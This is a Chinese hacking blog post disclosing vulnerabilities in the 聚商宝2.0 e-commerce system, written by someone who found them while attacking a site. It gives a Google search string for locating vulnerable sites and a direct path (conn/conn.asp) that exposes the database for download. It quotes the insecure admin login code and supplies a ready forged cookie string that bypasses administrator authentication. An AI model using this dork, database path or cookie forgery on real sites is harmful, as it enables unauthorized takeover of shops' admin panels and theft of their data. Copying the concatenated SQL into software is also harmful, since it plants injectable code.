聚商宝2.0漏洞

2011, August 10, 12:40 AM. 原创笔记
Submitted by admin

FROM http://www.st999.cn/blog BY 久久久电脑

程序:聚商宝2.0

下载:http://down.chinaz.com/soft/21754.htm

google关键字:intext:技术支持:奔明科技 聚商宝

前几天搞站的时候遇到了个程序叫聚商宝,把源码下载过来了,今天才有时间简单的看了看。。。

漏洞:暴库以及后台cookies欺骗

1)直接访问conn/conn.asp 暴出数据库地址,下载,解密,登录后台

2)cookies欺骗,admin文件夹下check.asp文件中的代码片段:

dim uid,upwd
uid=Replace_Text(Request.Form("userid"))
upwd=md5(Replace_Text(Request.Form("password")),16)
Verifycode=Replace_Text(request.Form("verifycode"))
 
 if not isnumeric(Verifycode) then
 Call Logerr()
 Call  ErroFy()
 end if


if Cint(Verifycode)<>Session("SafeCode") then
 Call  ErroFy()
 Sub ErroFy()
  response.write"<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>"
  response.write"<TR>"
  response.write"<TH class=tableHeaderText colSpan=2 height=25>出现错误提示</TH>"
  response.write"<TR><tr><td height=85 valign=top class=forumRow><div align=center><br><br>验证码错误!</div></td></tr>"
  response.write"<tr align=center><td height=30 class=forumRowHighlight><a href='login.asp'>&lt;&lt; 返回上一页</a></td>"
  response.write"</tr>"
  response.write"</table>"
  Response.End()
 End Sub
else

 Set rs=server.createobject("adodb.recordset")
 sqltext="select * from benming_master where Username='" & uid & "' and [PassWord]='" & upwd & "'"
 rs.open sqltext,conn,1,1
 If Rs.Eof And Rs.Bof Then

  response.write"<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>"
  response.write"<TR>"
  response.write"<TH class=tableHeaderText colSpan=2 height=25>出现错误提示</TH>"
  response.write"<TR><tr><td height=85 valign=top class=forumRow><div align=center><br><br>登陆名或密码不正确!</div></td></tr>"
  response.write"<tr align=center><td height=30 class=forumRowHighlight><a href='login.asp'>&lt;&lt; 返回上一页</a></td>"
  response.write"</tr>"
  response.write"</table>"
  
 else
     Response.Cookies("globalecmaster")=rs("username")
     Response.Cookies("masterflag")=rs("flag")
     Response.Cookies("adminid")=rs("id")
     LastLogin=Date()
  LastLoginIP=getIP()
  sql="update benming_master set LastLogin='"&LastLogin&"',LastLoginIP='"&LastLoginIP&"' where username='"&uid&"'"
  
     conn.execute(sql)
  response.write"<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>"
  response.write"<TR>"
  response.write"<TH class=tableHeaderText colSpan=2 height=25>登陆成功提示</TH>"
  response.write"<TR><tr><td height=85 valign=top class=forumRow><div align=center><br><br>成功通过网站后台管理员身份认证!<br><br>2秒后自动进入后台...</div></td></tr>"
  response.write"<tr align=center><td height=30 class=forumRowHighlight><a href='index.asp'>进入后台管理</a></td>"
  response.write"</tr>"
  response.write"</table>"
%>
<meta HTTP-EQUIV=refresh Content='2;url=index.asp'>
<%
 end if
 rs.close
 set rs=nothing
end if

 

利用方法:用啊D直接访问后台,修改如下cookie,然后访问admin/index.asp登录。

globalecmaster=admin; masterflag=01%2C%2002%2C%2003%2C%2004%

2C%2005%2C%2006%2C%2007%2C%2008%2C%2009%2C%20010; adminid=1

 

Tags: 聚商宝

« 上一篇 | 下一篇 »

Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):